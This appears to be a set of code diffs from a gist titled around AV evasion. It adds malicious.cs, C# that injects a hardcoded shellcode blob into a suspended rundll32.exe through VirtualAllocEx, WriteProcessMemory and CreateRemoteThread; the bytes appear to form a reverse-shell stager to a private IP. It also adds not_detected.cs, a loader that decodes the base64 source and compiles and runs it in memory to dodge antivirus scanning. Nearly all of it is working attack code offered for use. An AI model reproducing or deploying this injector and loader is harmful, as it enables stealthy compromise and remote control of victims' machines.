kapiushion · July 7, 2025 05:44 · Nov 17, 2017 · Nov 14, 2017
diff --git a/malicious.cs b/malicious.cs
@@ -1,10 +1,12 @@
 /*
 Author: Arno0x0x, Twitter: @Arno0x0x
 
-Encode this assembly in base64:
+DO NOT COMPILE THIS SOURCE FILE !
+
+Encode this source in base64:
 base64 -w0 malicious.cs > malicious.b64
 
-Then paste it in the code in "not_detected.cs"
+Then paste it in the code in "not_detected.cs" source file
 
 */
 

diff --git a/malicious.cs b/malicious.cs
@@ -0,0 +1,229 @@
+/*
+Author: Arno0x0x, Twitter: @Arno0x0x
+
+Encode this assembly in base64:
+base64 -w0 malicious.cs > malicious.b64
+
+Then paste it in the code in "not_detected.cs"
+
+*/
+
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System;
+using System.Text;
+public class nastyLittleDuck
+{
+    [StructLayout(LayoutKind.Sequential)]
+    public class SecurityAttributes
+    {
+        public Int32 Length = 0;
+        public IntPtr lpSecurityDescriptor = IntPtr.Zero;
+        public bool bInheritHandle = false;
+
+        public SecurityAttributes()
+        {
+            this.Length = Marshal.SizeOf(this);
+        }
+    }
+    [StructLayout(LayoutKind.Sequential)]
+    public struct ProcessInformation
+    {
+        public IntPtr hProcess;
+        public IntPtr hThread;
+        public Int32 dwProcessId;
+        public Int32 dwThreadId;
+    }
+    [Flags]
+    public enum CreateProcessFlags : uint
+    {
+        DEBUG_PROCESS = 0x00000001,
+        DEBUG_ONLY_THIS_PROCESS = 0x00000002,
+        CREATE_SUSPENDED = 0x00000004,
+        DETACHED_PROCESS = 0x00000008,
+        CREATE_NEW_CONSOLE = 0x00000010,
+        NORMAL_PRIORITY_CLASS = 0x00000020,
+        IDLE_PRIORITY_CLASS = 0x00000040,
+        HIGH_PRIORITY_CLASS = 0x00000080,
+        REALTIME_PRIORITY_CLASS = 0x00000100,
+        CREATE_NEW_PROCESS_GROUP = 0x00000200,
+        CREATE_UNICODE_ENVIRONMENT = 0x00000400,
+        CREATE_SEPARATE_WOW_VDM = 0x00000800,
+        CREATE_SHARED_WOW_VDM = 0x00001000,
+        CREATE_FORCEDOS = 0x00002000,
+        BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
+        ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
+        INHERIT_PARENT_AFFINITY = 0x00010000,
+        INHERIT_CALLER_PRIORITY = 0x00020000,
+        CREATE_PROTECTED_PROCESS = 0x00040000,
+        EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
+        PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
+        PROCESS_MODE_BACKGROUND_END = 0x00200000,
+        CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
+        CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
+        CREATE_DEFAULT_ERROR_MODE = 0x04000000,
+        CREATE_NO_WINDOW = 0x08000000,
+        PROFILE_USER = 0x10000000,
+        PROFILE_KERNEL = 0x20000000,
+        PROFILE_SERVER = 0x40000000,
+        CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
+    }
+    [Flags]
+    public enum DuplicateOptions : uint
+    {
+        DUPLICATE_CLOSE_SOURCE = 0x00000001,
+        DUPLICATE_SAME_ACCESS = 0x00000002
+    }
+    [StructLayout(LayoutKind.Sequential)]
+    public class StartupInfo
+    {
+        public Int32 cb = 0;
+        public IntPtr lpReserved = IntPtr.Zero;
+        public IntPtr lpDesktop = IntPtr.Zero; // MUST be Zero
+        public IntPtr lpTitle = IntPtr.Zero;
+        public Int32 dwX = 0;
+        public Int32 dwY = 0;
+        public Int32 dwXSize = 0;
+        public Int32 dwYSize = 0;
+        public Int32 dwXCountChars = 0;
+        public Int32 dwYCountChars = 0;
+        public Int32 dwFillAttribute = 0;
+        public Int32 dwFlags = 0;
+        public Int16 wShowWindow = 0;
+        public Int16 cbReserved2 = 0;
+        public IntPtr lpReserved2 = IntPtr.Zero;
+        public IntPtr hStdInput = IntPtr.Zero;
+        public IntPtr hStdOutput = IntPtr.Zero;
+        public IntPtr hStdError = IntPtr.Zero;
+        public StartupInfo()
+        {
+            this.cb = Marshal.SizeOf(this);
+        }
+    }
+    [Flags()]
+    public enum AllocationType : uint
+    {
+        COMMIT = 0x1000,
+        RESERVE = 0x2000,
+        GO = 0x3000,
+        RESET = 0x80000,
+        LARGE_PAGES = 0x20000000,
+        PHYSICAL = 0x400000,
+        TOP_DOWN = 0x100000,
+        WRITE_WATCH = 0x200000
+    }
+    [Flags()]
+    public enum MemoryProtection : uint
+    {
+        EXECUTE = 0x10,
+        EXECUTE_READ = 0x20,
+        EXECUTE_READWRITE = 0x40,
+        EXECUTE_WRITECOPY = 0x80,
+        NOACCESS = 0x01,
+        READONLY = 0x02,
+        READWRITE = 0x04,
+        WRITECOPY = 0x08,
+        GUARD_Modifierflag = 0x100,
+        NOCACHE_Modifierflag = 0x200,
+        WRITECOMBINE_Modifierflag = 0x400
+    }
+    [DllImport("kernel32.dll")]
+    public static extern IntPtr CreateProcessA(
+            String lpApplicationName,
+            String lpCommandLine,
+            SecurityAttributes lpProcessAttributes,
+            SecurityAttributes lpThreadAttributes,
+            Boolean bInheritHandles,
+            CreateProcessFlags dwCreationFlags,
+            IntPtr lpEnvironment,
+            String lpCurrentDirectory,
+            [In] StartupInfo lpStartupInfo,
+            out ProcessInformation lpProcessInformation
+
+        );
+    [DllImport("kernel32.dll")]
+    public static extern IntPtr VirtualAllocEx(
+           IntPtr lpHandle,
+           IntPtr lpAddress,
+           IntPtr dwSize,
+           AllocationType flAllocationType,
+           MemoryProtection flProtect
+        );
+    [DllImport("kernel32.dll")]
+    public static extern bool WriteProcessMemory(
+        IntPtr hProcess,
+        IntPtr lpBaseAddress,
+        byte[] buffer,
+        IntPtr dwSize,
+        int lpNumberOfBytesWritten);
+    [DllImport("kernel32.dll")]
+    public static extern bool TerminateProcess(
+        IntPtr hProcess, 
+        uint uExitCode);
+    [DllImport("kernel32.dll")]
+    static extern IntPtr CreateRemoteThread(
+        IntPtr hProcess,
+        IntPtr lpThreadAttributes,
+        uint dwStackSize,
+        IntPtr lpStartAddress,
+        IntPtr lpParameter,
+        uint dwCreationFlags,
+        IntPtr lpThreadId);
+    public static void Main()
+    {
+		string binary = "rundll32.exe";
+		byte[] sc = new byte[333] {
+				0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
+				0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
+				0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
+				0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
+				0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
+				0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
+				0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
+				0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
+				0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
+				0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
+				0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
+				0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x34,0x86,0x68,0x02,
+				0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
+				0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
+				0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,
+				0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
+				0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
+				0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
+				0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,
+				0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
+				0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,
+				0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,
+				0x53,0xff,0xd5 };
+        IntPtr size = new IntPtr(sc.Length);
+        StartupInfo sInfo = new StartupInfo();
+        sInfo.dwFlags = 0;
+        ProcessInformation pInfo;
+        string binaryPath = "";
+        if (Environment.GetEnvironmentVariable("ProgramW6432").Length > 0)
+        {
+            binaryPath = Environment.GetEnvironmentVariable("windir") + "\\SysWOW64\\" + binary;
+        }
+        else
+        {
+            binaryPath = Environment.GetEnvironmentVariable("windir") + "\\System32\\" + binary;
+        }
+        IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
+        IntPtr hProcess = pInfo.hProcess;
+        if (hProcess.ToString() != "0") { 
+            IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, AllocationType.GO, MemoryProtection.EXECUTE_READWRITE);
+            if (spaceAddr.ToString() == "0")
+            {
+                TerminateProcess(hProcess, 0);
+            }
+            else
+            {
+                int test = 0;
+                IntPtr size2 = new IntPtr(sc.Length);
+                bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);
+                CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
+            }
+        }
+     }
+}
diff --git a/not_detected.cs b/not_detected.cs
@@ -0,0 +1,42 @@
+/*
+Author: Arno0x0x, Twitter: @Arno0x0x
+
+===================================== COMPILING =====================================
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:not_detected2.exe not_detected2.cs
+
+*/
+
+using System;
+using System.Text;
+using Microsoft.CSharp;
+using System.CodeDom.Compiler;
+using System.Reflection;
+
+class Program
+{
+	static void Main()
+	{
+		string code = Encoding.UTF8.GetString(Convert.FromBase64String("<--- malicious.cs BASE64 ENCODED--->"));
+		CSharpCodeProvider provider = new CSharpCodeProvider();
+		CompilerParameters parameters = new CompilerParameters();
+		parameters.ReferencedAssemblies.Add("System.dll");
+		parameters.GenerateInMemory = true;
+		parameters.GenerateExecutable = true;
+		CompilerResults results = provider.CompileAssemblyFromSource(parameters, code);
+		if (results.Errors.HasErrors)
+		{
+			StringBuilder sb = new StringBuilder();
+
+			foreach (CompilerError error in results.Errors)
+			{
+				sb.AppendLine(String.Format("Error ({0}): {1}", error.ErrorNumber, error.ErrorText));
+			}
+
+			throw new InvalidOperationException(sb.ToString());
+		}
+		Assembly assembly = results.CompiledAssembly;
+		Type program = assembly.GetType("nastyLittleDuck");
+		MethodInfo main = program.GetMethod("Main");
+		main.Invoke(null, null);
+	}
+}